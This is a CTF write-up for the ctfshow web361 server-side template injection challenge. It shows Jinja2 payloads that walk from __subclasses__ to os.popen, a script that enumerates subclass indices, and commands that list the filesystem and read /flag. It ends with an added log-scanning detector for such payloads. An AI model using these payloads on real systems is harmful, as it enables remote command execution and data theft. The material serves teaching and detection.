ctfshow-web361(SSTI)
2022-04-23 18:33:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
The page prompts "Hello", so the guess is that the input parameter is name.
?name={{[].__class__.__base__.__subclasses__()}}
Next, a script should be written and run to find the required functions (I used someone else's; I can't write Python scripts yet).
Here the os._wrap_close class is used.
import requests
from tqdm import tqdm

# Request each subclass index in turn and report the one whose rendered name is os._wrap_close
for i in tqdm(range(233)):
    url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={{%22%22.__class__.__bases__[0].__subclasses__()[' + str(i) + ']}}'
    r = requests.get(url=url).text
    if 'os._wrap_close' in r:
        print(i)
Output: 132
Then start using it.
Use __init__.__globals__ to look up popen (it only has to be found; its position is not needed).
__globals__:
This attribute is specific to functions and records the global variables of the file in which the function is defined. If that file imports libraries such as os or sys, but we can only reach one function or object from the file, the __globals__ attribute can be used to access those global variables.
So __init__.__globals__ should be accessing the global variables.
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}
This should call popen from the global variables.
The os.popen() method is used to open a pipe from a command. (I don't quite understand the details; you can use it to run commands.)
The terminal output of popen is obtained with p.read().
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}
When a file is opened with the open() function in a readable mode (including r, r+, rb, rb+), read() can be called to read the contents of the file byte by byte (or character by character). (popen probably relies on the open() function; I'm not very clear on this.)
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
I roughly understand it and know why, but it won't work.
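A log-side check for the payloads used in this write-up, as an added example that is not part of the original post: it decodes query parameters from access-log lines, flags values that combine `{{` with the dunder attribute chain, and reports clients that probe several `__subclasses__()[i]` indices the way the enumeration script does. The log format, client addresses and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Dunder attributes that make up the object-walking chain shown in the write-up.
CHAIN = ("__class__", "__base__", "__bases__", "__subclasses__", "__init__", "__globals__")
INDEX = re.compile(r"__subclasses__\(\)\[(\d+)\]")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Undo nested percent-encoding so that %257B%257B is seen as {{."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def scan(lines, enum_threshold=3):
    """Return (hits, enumerators): flagged parameters and clients probing many indices."""
    hits, indices = [], defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        for param, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = decode(raw)
            tokens = [t for t in CHAIN if t in value]
            if "{{" in value and tokens:  # template delimiter plus attribute chain
                hits.append((client, param, tokens))
                indices[client].update(int(i) for i in INDEX.findall(value))
    enumerators = sorted(c for c, seen in indices.items() if len(seen) >= enum_threshold)
    return hits, enumerators

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '198.51.100.7 - - [23/Apr/2022:18:30:01 +0000] "GET /?name=alice HTTP/1.1" 200 12',
    '198.51.100.7 - - [23/Apr/2022:18:30:02 +0000] "GET /?name=__init__.py HTTP/1.1" 200 18',
] + [
    f'203.0.113.9 - - [23/Apr/2022:18:31:0{i} +0000] '
    f'"GET /?name=%7B%7B%22%22.__class__.__bases__[0].__subclasses__()[{i}]%7D%7D HTTP/1.1" 200 40'
    for i in range(4)
] + [
    '203.0.113.9 - - [23/Apr/2022:18:32:00 +0000] '
    '"GET /?name=%257B%257B[].__class__.__base__.__subclasses__()[132].__init__.__globals__%257D%257D HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A value such as `__init__.py` is not flagged because the check requires the template delimiter as well as a chain attribute.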